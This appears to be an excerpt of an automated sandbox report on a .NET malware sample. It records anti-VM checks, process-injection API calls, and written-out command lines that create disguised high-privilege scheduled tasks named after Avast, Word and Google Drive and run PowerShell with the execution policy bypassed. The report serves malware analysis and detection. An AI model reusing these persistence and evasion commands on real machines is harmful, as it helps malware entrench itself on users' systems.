Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.0000000003151000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002531000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMemory allocated: 1200000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMemory allocated: 1ACA0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1B3E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeMemory allocated: F60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeMemory allocated: 1AF10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeMemory allocated: 3050000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeMemory allocated: 1B150000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 2750000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 1A7E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1AFB0000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 2BF0000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 1ADB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 24E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 2290000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 1A530000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599641Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWindow / User API: threadDelayed 9915Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9894Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWindow / User API: threadDelayed 9954
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9923
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeDropped PE file which has not been started: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exeJump to dropped file
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -599875s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -599766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -599641s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9836Thread sleep count: 9894 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9920Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 10196Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe TID: 6888Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 3672Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 8564Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 9048Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 9224Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 1688Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599641Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: ptKNiAaGus.exe, 00000000.00000002.3333580070.000000001B79A000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service5
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D683000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition6457
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitionun?8
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitiona
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3334551857.000000001B836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"0
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesu
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorrB
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor>
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor;
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dll passwordFormat="Hashed"
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor~8
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorl(R)
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exeProcess token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exeProcess token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
.NET source code references suspicious native API functions
Source: ptKNiAaGus.exe, IPlSSVquzizB.csReference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.gTPIGMjoKzHn()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.WonKffqJoEpSsUk()), typeof(xkmuEWGEmcLRyMY.OpenProcess), ref Parameters)
Source: ptKNiAaGus.exe, IPlSSVquzizB.csReference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.DWZXpvweMZwNY()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.BzDdWBETxCu()), typeof(xkmuEWGEmcLRyMY.NtProtectVirtualMemory), ref Parameters)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe" Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
